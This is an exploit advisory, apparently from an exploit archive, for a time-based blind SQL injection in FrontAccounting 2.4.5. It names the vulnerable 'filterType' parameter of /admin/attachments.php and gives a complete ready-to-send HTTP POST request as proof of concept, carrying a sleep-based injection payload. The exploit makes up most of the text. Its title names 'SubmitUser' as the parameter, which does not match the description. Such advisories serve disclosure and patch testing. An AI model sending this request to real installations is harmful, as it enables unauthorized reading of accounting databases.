37 lines
No EOL
1.6 KiB
Text
37 lines
No EOL
1.6 KiB
Text
# Exploit Title: FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 2018-12-22
|
|
# Exploit Author: Sainadh Jamalpur
|
|
# Vendor Homepage: http://frontaccounting.com/
|
|
# Software Link: https://sourceforge.net/projects/frontaccounting/
|
|
# Version: 2.4.5
|
|
# Tested on: XAMPP version 3.2.2 in Windows 10 64bit, Kali linux X64
|
|
# CVE : N/A
|
|
|
|
# ========================= Vendor Summery =====================
|
|
#
|
|
# FrontAccounting (FA) is a professional web-based Accounting system for
|
|
# the entire ERP chain written in PHP, using MySQL. FA is multilingual and
|
|
# multicurrency.
|
|
#
|
|
# ======================== Vulnerability Description ===============
|
|
#
|
|
# the parameter "filterType" in /attachments.php is Vulnerable to Time
|
|
# Based Blind SQL Injection.
|
|
#
|
|
# ======================== PoC =======================================
|
|
|
|
POST /frontaccounting/admin/attachments.php? HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0)
|
|
Gecko/20100101 Firefox/64.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Referer: http://localhost/frontaccounting/admin/attachments.php?
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 367
|
|
DNT: 1
|
|
Connection: close
|
|
Cookie:
|
|
Upgrade-Insecure-Requests: 1
|
|
user_name_entry_field=admin&password=1234&company_login_name=0&ui_mode=1&SubmitUser=%A0%A0Login+--%3E%A0%A0&_random=831749.090143524&_token=1RJ9WhkRWKszXu-uPm6DTQxx&_confirmed=&_modified=0&_focus=filterType&ADD_ITEM=Add+new&description=&trans_no=&filterType=(select*from(select(sleep(20)))a)&_focus=filterType&_modified=0&_confirmed=&_token=Om-2mt32ZC3UkLAuzPwoFgxx |